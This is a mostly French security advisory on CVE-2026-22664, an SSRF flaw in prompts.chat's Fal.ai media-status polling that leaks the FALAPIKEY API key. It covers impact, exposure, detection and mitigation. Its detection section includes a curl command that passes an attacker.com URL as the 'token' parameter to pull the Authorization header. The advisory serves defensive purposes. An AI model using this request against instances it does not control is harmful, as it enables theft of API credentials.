Plateforme
nodejs
Composant
prompts-chat
Corrigé dans
30a8f0470e0ba45e6be9c9f55220f4a9a6b91c99
Une vulnérabilité de type Server-Side Request Forgery (SSRF) a été découverte dans prompts.chat, affectant les versions antérieures à 30a8f0470e0ba45e6be9c9f55220f4a9a6b91c99. Cette faille permet à des utilisateurs authentifiés d'initier des requêtes sortantes arbitraires en manipulant le paramètre 'token'. La vulnérabilité réside dans le mécanisme de vérification des statuts média de Fal.ai, où l'URL fournie par l'attaquant n'est pas correctement validée.
L'exploitation réussie de cette vulnérabilité SSRF permet à un attaquant de divulguer la clé API FALAPIKEY, qui est incluse dans l'en-tête d'autorisation des requêtes. Cette clé permet un accès non autorisé au compte Fal.ai de la victime, ouvrant la voie à diverses actions malveillantes. L'attaquant peut ainsi effectuer des requêtes internes, explorer le réseau interne de l'organisation, voler des données sensibles et abuser du compte Fal.ai pour des activités malhonnêtes. Le rayon d'impact est potentiellement élevé, car la divulgation de la clé API permet un contrôle significatif sur l'environnement Fal.ai.
Cette vulnérabilité a été rendue publique le 2026-04-03. Il n'y a pas d'indication d'une inclusion dans le KEV de CISA à ce jour. Aucun Proof of Concept (PoC) public n'a été observé, mais la nature de la vulnérabilité SSRF la rend potentiellement exploitable par des acteurs malveillants disposant de compétences techniques. Il est conseillé de surveiller les forums de sécurité et les bases de données de vulnérabilités pour détecter d'éventuelles nouvelles informations.
Organizations utilizing prompts.chat for internal communication or AI-powered chatbot applications are at risk. Specifically, deployments that rely on Fal.ai for media processing or storage are particularly vulnerable. Shared hosting environments where multiple users share the same prompts.chat instance should be carefully assessed, as a compromised account could impact other users.
• nodejs / server: Monitor application logs for outbound requests to unusual or unexpected domains. Use lsof or netstat to identify processes making outbound connections to suspicious IP addresses or ports.
lsof -i | grep prompts.chat• generic web: Use curl to test the media status polling endpoint with a crafted URL containing a known malicious domain. Examine the response headers for any signs of credential leakage.
curl -v 'https://your-prompts-chat-instance/api/media_status?token=https://attacker.com' 2>&1 | grep Authorizationdisclosure
Statut de l'Exploit
EPSS
0.03% (percentile 9%)
CISA SSVC
Vecteur CVSS
La mitigation principale consiste à mettre à jour prompts.chat vers la version corrigée 30a8f0470e0ba45e6be9c9f55220f4a9a6b91c99. Si la mise à jour n'est pas immédiatement possible, une solution temporaire consiste à implémenter une validation stricte des URL dans le code de vérification des statuts média de Fal.ai. Il est également recommandé de limiter les accès au service prompts.chat aux utilisateurs authentifiés et de surveiller les journaux d'accès pour détecter des requêtes suspectes. Après la mise à jour, vérifiez que la clé API FALAPIKEY n'est plus exposée dans les en-têtes de requête.
Mettez à jour prompts.chat à la version qui inclut le commit 30a8f0470e0ba45e6be9c9f55220f4a9a6b91c99. Cette correction valide les URLs fournies dans le paramètre token pendant le sondage de l'état des médias de Fal.ai, atténuant la vulnérabilité SSRF.
Analyses de vulnérabilités et alertes critiques directement dans votre boîte mail.
CVE-2026-22664 is a server-side request forgery vulnerability in prompts.chat that allows attackers to disclose sensitive API keys by manipulating URLs.
You are affected if you are using prompts.chat versions prior to 30a8f0470e0ba45e6be9c9f55220f4a9a6b91c99.
Upgrade to version 30a8f0470e0ba45e6be9c9f55220f4a9a6b91c99 or later. Implement WAF rules to block suspicious outbound requests.
There is currently no confirmed active exploitation, but the vulnerability's potential for credential theft makes it a likely target.
Refer to the prompts.chat release notes and security advisories on their official website or GitHub repository.
Téléverse ton fichier de dépendances et découvre instantanément si cette CVE et d'autres te touchent.